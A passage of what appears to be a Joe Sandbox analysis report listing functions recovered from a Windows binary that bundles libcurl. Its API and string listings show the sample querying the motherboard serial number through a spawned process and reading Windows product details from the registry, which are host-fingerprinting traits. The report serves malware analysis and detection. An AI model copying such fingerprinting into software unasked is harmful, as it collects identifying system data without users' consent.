    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00679144
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067915C
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006791BF
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006793B9
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006793C8
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006793FE
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00679549
    Strings
    • ** Resuming transfer from byte position %I64d, xrefs: 00678F0A
    • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00678F21
    • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00679516
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CheckStackVars@8
    • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
    • API String ID: 2688700365-664487449
    • Opcode ID: f15820bdd121af6d0f492136ace6ff0c71f2ab21b81e472d3347e67ba796ee39
    • Instruction ID: 13d0eb2dfdc85f48cb8069037a3cded34b79160eb61e8a512f43d0546e81169b
    • Opcode Fuzzy Hash: f15820bdd121af6d0f492136ace6ff0c71f2ab21b81e472d3347e67ba796ee39
    • Instruction Fuzzy Hash: 1B22EBB5A00219DFDB58DB98C895FDEB7B6BB88304F1482A9E50DAB341D7316E81CF50
    Function 006311B0 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 339processfilesynchronizationCOMMON
    Download Yara Rule
    APIs
    • CreatePipe.KERNEL32 ref: 00631338
    • GetStartupInfoW.KERNEL32(00000044), ref: 0063134D
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,00000000), ref: 00631398
    • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 006313AD
    • ReadFile.KERNEL32(?,?,00002710,00000000,00000000), ref: 006313CE
    • CloseHandle.KERNEL32(?), ref: 00631422
    • CloseHandle.KERNEL32(?), ref: 0063142A
    • CloseHandle.KERNEL32(00000000), ref: 00631432
    • CloseHandle.KERNEL32(00000000), ref: 0063143A
    • CloseHandle.KERNEL32(?), ref: 006315E6
    • CloseHandle.KERNEL32(?), ref: 006315EE
    • CloseHandle.KERNEL32(?), ref: 006315F6
    • CloseHandle.KERNEL32(?), ref: 006315FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CloseHandle$Create$FileInfoObjectPipeProcessReadSingleStartupWait
    • String ID: D$SerialNumber$eBoard get SerialNumber
    • API String ID: 2155516692-899644127
    • Opcode ID: 71c289b409b562e5f54712a8bef8812c1293e8a2ef814ea364b8187c0a4609f1
    • Instruction ID: 486a60e8c5c23b49be629d067dbb1a8e5d7d2302dd9080015a4016a07ef059ca
    • Opcode Fuzzy Hash: 71c289b409b562e5f54712a8bef8812c1293e8a2ef814ea364b8187c0a4609f1
    • Instruction Fuzzy Hash: 9DE18F719082289BDB25DB24CD5DBDDB7B6EF4A300F1482DEE40DAA291DB715AC4CF90
    Function 006A5AA0 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 283windowCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?), ref: 006A5AC9
    • _strncpy.LIBCMT ref: 006A5F72
    • FormatMessageA.KERNEL32(00001200,00000000,80090326,00000000,?,000000FF,00000000), ref: 006A6010
    • _strrchr.LIBCMT ref: 006A6072
    • _strrchr.LIBCMT ref: 006A60AE
    • _strncpy.LIBCMT ref: 006A612A
    • GetLastError.KERNEL32 ref: 006A6153
    • SetLastError.KERNEL32(80090326), ref: 006A616B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A6185
    Strings
    • pgp, xrefs: 006A5F23
    • P, xrefs: 006A5FD8
    • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 006A5F8C
    • I, xrefs: 006A5B96
    • 4`p, xrefs: 006A5F6A, 006A5F6D
    • %s - %s, xrefs: 006A6104
    • %s (0x%08X), xrefs: 006A5FB7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$_strncpy_strrchr$CheckFormatMessageStackVars@8
    • String ID: %s (0x%08X)$%s - %s$4`p$I$P$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$pgp
    • API String ID: 4228243871-2879438924
    • Opcode ID: a9962925bd2b075cbfd12e0d3828741f2730f95bc2f5194d94fb3a06ffb78fcd
    • Instruction ID: 9f07bdaacd1b7e9e8b342c6f4833113c284d60fa804c6190b8b7e56382533472
    • Opcode Fuzzy Hash: a9962925bd2b075cbfd12e0d3828741f2730f95bc2f5194d94fb3a06ffb78fcd
    • Instruction Fuzzy Hash: 18C1B1B0804229DFCB10EF54CC55BEEB7B6FB06308F548299E50A6B281C7B44E85CF91
    Function 00686E60 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 216COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$Stack$CheckFailureVars@8
    • String ID: 0$curl$curl$curl$i386-pc-win32$i386-pc-win32$i386-pc-win32
    • API String ID: 269525442-1854133362
    • Opcode ID: a4979647c9ba37b7f48f3e3b6ed1f8128f5455f7b3b8ba0124d7e7eeeeac5818
    • Instruction ID: 182a6ebdb35278215cf8d1068ca5dd4ee5815c8a4eb7c7fddbd3f765a2a1bd92
    • Opcode Fuzzy Hash: a4979647c9ba37b7f48f3e3b6ed1f8128f5455f7b3b8ba0124d7e7eeeeac5818
    • Instruction Fuzzy Hash: 7C913FF5A002189BDB54DB54DC51FE9B3BAAF84304F4441ECE60DA7342EA35AB84CF99
    Function 0066EAA0 Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 425COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 0066EB8A
    • ___from_strstr_to_strchr.LIBCMT ref: 0066EC20
    • _strlen.LIBCMT ref: 0066EF2F
      • Part of subcall function 006BF68C: ___report_securityfailure.LIBCMT ref: 006BF691
    • ___from_strstr_to_strchr.LIBCMT ref: 0066ED3F
    • _strlen.LIBCMT ref: 0066ED5D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066F0F2
    Strings
    • Resolve address '%s' found illegal!, xrefs: 0066EE65
    • Added %s:%d:%s to DNS cache, xrefs: 0066F071
    • @, xrefs: 0066EDE4
    • Couldn't parse CURLOPT_RESOLVE removal entry '%s'!, xrefs: 0066EB4E
    • RESOLVE %s:%d is - old addresses discarded!, xrefs: 0066EF96
    • @, xrefs: 0066EE1B
    • Couldn't parse CURLOPT_RESOLVE entry '%s'!, xrefs: 0066EEE1
    • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 0066F0B9
    • %255[^:]:%d, xrefs: 0066EB2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$___from_strstr_to_strchr$CheckStackVars@8___report_securityfailure
    • String ID: %255[^:]:%d$@$@$Added %s:%d:%s to DNS cache$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!$RESOLVE %s:%d is - old addresses discarded!$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal!
    • API String ID: 2567281970-3659146380
    • Opcode ID: 768496596449e04199dee4de850dfbf1b5066160b9c1398cbc56d1176e9ebad6
    • Instruction ID: 1637fb079943001a36617db923cd1e2bf26ca1c21e000e8f08f634fd6fac6bb4
    • Opcode Fuzzy Hash: 768496596449e04199dee4de850dfbf1b5066160b9c1398cbc56d1176e9ebad6
    • Instruction Fuzzy Hash: 4E0290B9A002189FDB64DF54C899BEEB776AF45304F1481E9E4096B341DB76AEC1CF80
    Function 0066B400 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 375COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066B918
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • %zx%s, xrefs: 0066B7A2
    • Signaling end of chunked upload after trailers., xrefs: 0066B8A8
    • Read callback asked for PAUSE when not supported!, xrefs: 0066B68A
    • Moving trailers state machine from initialized to sending., xrefs: 0066B454
    • operation aborted by trailing headers callback, xrefs: 0066B51D
    • operation aborted by callback, xrefs: 0066B63D
    • *, xrefs: 0066B537
    • Signaling end of chunked upload via terminating chunk., xrefs: 0066B8D9
    • Successfully compiled trailers., xrefs: 0066B56A
    • Unable to allocate trailing headers buffer !, xrefs: 0066B48C
    • read function returned funny value, xrefs: 0066B700
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %zx%s$*$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$Unable to allocate trailing headers buffer !$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
    • API String ID: 1951014933-2247196750
    • Opcode ID: 0191d599184406609e4aa0fb6583bf4fe6785bee22fc58a2f63a68a63fbfaee2
    • Instruction ID: 58c11fdb485f1c445184e02b818723ce343f56c336f1c94a9850fe0cbfd91c57
    • Opcode Fuzzy Hash: 0191d599184406609e4aa0fb6583bf4fe6785bee22fc58a2f63a68a63fbfaee2
    • Instruction Fuzzy Hash: 11F17CB4E00209EFDB14DF94D891BEEBBB6BF49304F1441ACE509AB351D735A981CB91
    Function 00658600 Relevance: 24.9, APIs: 9, Strings: 5, Instructions: 365COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00658A4B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: public key hash: sha256//%s$;sha256//$Z$sha256//$sha256//
    • API String ID: 930174750-3445147834
    • Opcode ID: 715c8fffc7ea512a1d6693c03578379cd417c2058b4ff5f328e87a35123e9f7d
    • Instruction ID: 5c3ff454647e456329e5d8df2d7df3ef79b3ebdc9a651d787b599d93ae24b7e5
    • Opcode Fuzzy Hash: 715c8fffc7ea512a1d6693c03578379cd417c2058b4ff5f328e87a35123e9f7d
    • Instruction Fuzzy Hash: 55D14BB1D00208EFDF14EFA8D846BEE77B7AB44305F144129E905BB241EB74AD49CB96
    Function 0068D2D8 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 356COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D7A1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
    • API String ID: 930174750-3837278924
    • Opcode ID: 4af2a4f3b939d783395402321ee233ee93ad85603f664a8ad772a50ffcce8198
    • Instruction ID: 94cdaca03aef809c80dcb3e8763fd632e72985abe3f99d5e1ebac4a12d7bdedf
    • Opcode Fuzzy Hash: 4af2a4f3b939d783395402321ee233ee93ad85603f664a8ad772a50ffcce8198
    • Instruction Fuzzy Hash: 52E144B5E00108AFCB14DF58D885EEE77B6BF48314F14826CF9196B382D635E981CBA5
    Function 0068B0B0 Relevance: 24.8, APIs: 3, Strings: 11, Instructions: 276COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strncpy$CheckStackVars@8
    • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
    • API String ID: 724169420-2750142079
    • Opcode ID: 4bc857b745cef49a71e8b8e035dd3951dfc0c35373cd02e762fdd3a3da28af88
    • Instruction ID: 051e82f09fc74d64496be0b0511d858017732a418e6b88fe1dfce0419d2a5ebb
    • Opcode Fuzzy Hash: 4bc857b745cef49a71e8b8e035dd3951dfc0c35373cd02e762fdd3a3da28af88
    • Instruction Fuzzy Hash: 24C1D4B5E002089FEB14DB14CC95FEAB3B6AF85304F1481ECE5495B382DB759A85CF92
    Function 00666890 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 174libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(kernel32), ref: 006668C9
    • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 006668F1
    • _strpbrk.LIBCMT ref: 0066690A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressHandleModuleProc_strpbrk
    • String ID: AddDllDirectory$LoadLibraryExA$kernel32
    • API String ID: 1657965159-3327535076
    • Opcode ID: 4dee00fbb80b2a97d0c6625e1babce956b5b60b9e0f3bb7e8b97b8a065a1797f
    • Instruction ID: 3b4dffa2e15b28a2c7a8705567c2843687f5099ef2c683c06d1ae67ec7a3b98b
    • Opcode Fuzzy Hash: 4dee00fbb80b2a97d0c6625e1babce956b5b60b9e0f3bb7e8b97b8a065a1797f
    • Instruction Fuzzy Hash: 0D5140B1D00219AFCB50EFA8D846BEEBBB6AF05300F114558F909B7250D7359E81CBD1
    Function 00642020 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383registryCOMMON
    Download Yara Rule
    APIs
    • GetNativeSystemInfo.KERNEL32(?), ref: 006420B3
    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?, 64bit), ref: 00642106
    • RegQueryValueExW.ADVAPI32(?,ProductName,00000000,00000001,00000000,00000032), ref: 00642121
    • RegQueryValueExW.ADVAPI32(?,EditionID,00000000,00000001,?,00000032), ref: 00642140
    • RegCloseKey.ADVAPI32(?), ref: 0064216B
    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000), ref: 006421BB
    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,00000000,00000001), ref: 00642241
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ByteCharMultiQueryValueWide$CloseInfoNativeOpenSystem
    • String ID: 32bit$ 64bit$2$EditionID$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
    • API String ID: 3088734169-386522035
    • Opcode ID: b29726a378c37b29600f7db504a19c506adc2ecfdd4b304a6324493822c2f029
    • Instruction ID: 531a5b99d17d0cf442179ebb91b1b3bf478c34faf6a99e99da3b89ffd56d5b34
    • Opcode Fuzzy Hash: b29726a378c37b29600f7db504a19c506adc2ecfdd4b304a6324493822c2f029
    • Instruction Fuzzy Hash: 0ED1E471A002069FDB14DFA8CC95BEEBBB6EF05310F64426CF905AB291D7746E45CBA0
    Function 006D2C02 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$Info
    • String ID:
    • API String ID: 2509303402-0
    • Opcode ID: 1ee5db68ff6e7ff00147adcf352ced2ec56e4556ee84db764036dea1953a0158
    • Instruction ID: 71538ff3fda4b51c5489b0c9ba41fac44df5f7180fef38e6356aff693b3ac1e1
    • Opcode Fuzzy Hash: 1ee5db68ff6e7ff00147adcf352ced2ec56e4556ee84db764036dea1953a0158
    • Instruction Fuzzy Hash: 4ED17C71D002469FDB21DFA8C891BEEBBF6BF18300F14456EE495AB342DB71A945CB50
    Function 00666C60 Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 455networkCOMMON
    Download Yara Rule
    APIs
    • select.WS2_32(FFFFFFFE,00000000,00000000,00000000,00000000), ref: 00667177
    • WSAGetLastError.WS2_32 ref: 0066719A
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 006672A3
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 006672C6
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 006672EF
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 00667312
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 0066733B
    • __WSAFDIsSet.WS2_32(000000FF,00000000), ref: 0066735E
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00667386
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8select
    • String ID: @$@$@
    • API String ID: 1206456650-1177533131
    • Opcode ID: 1484e8a17b8ee918b2e28bb59d712d7739d65be129bc559d6306d46f3a202a58
    • Instruction ID: 5831c6778b160758748fdbcffb8c132cc6f31660ebff9e202582b1b03866aa6f
    • Opcode Fuzzy Hash: 1484e8a17b8ee918b2e28bb59d712d7739d65be129bc559d6306d46f3a202a58
    • Instruction Fuzzy Hash: E522E7B0904218DBCF6ACF14D8947E9B7BABB48318F1486D9E81A67390D731AF81CF55
    Function 0063C8F0 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 414COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0063EA50: std::locale::_Init.LIBCPMT ref: 0063EADB
      • Part of subcall function 0063E530: std::locale::_Init.LIBCPMT ref: 0063E572
      • Part of subcall function 00633B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00633BD1
      • Part of subcall function 00633B90: _wcsrchr.LIBVCRUNTIME ref: 00633BE0
    • __Xtime_get_ticks.LIBCPMT ref: 0063CC35
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0063CC43
    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0063CE57
    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0063CF01
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InitIos_base_dtorstd::ios_base::_std::locale::_$FileModuleNameUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
    • String ID: %d-%02d-%02d %02d:%02d:%02d$X$`$time.txt$wo$wo$wo$wo
    • API String ID: 2939959394-3650461371
    • Opcode ID: d8885379745a63ce41b316d5799c567604fa97dc2b4702ff5b77a850739d5e47
    • Instruction ID: db824e6705c740dc6efd7f2b38427e4d427b33728c7e077a0d733532f130c6f5
    • Opcode Fuzzy Hash: d8885379745a63ce41b316d5799c567604fa97dc2b4702ff5b77a850739d5e47
    • Instruction Fuzzy Hash: 5B025D719002489FDB14DF68CD85BDDBBFABF05304F1085ADE909AB291E735AA45CF90
    Function 006734A9 Relevance: 21.4, APIs: 1, Strings: 11, Instructions: 382COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00673B05
      • Part of subcall function 0066A280: _strlen.LIBCMT ref: 0066A29F
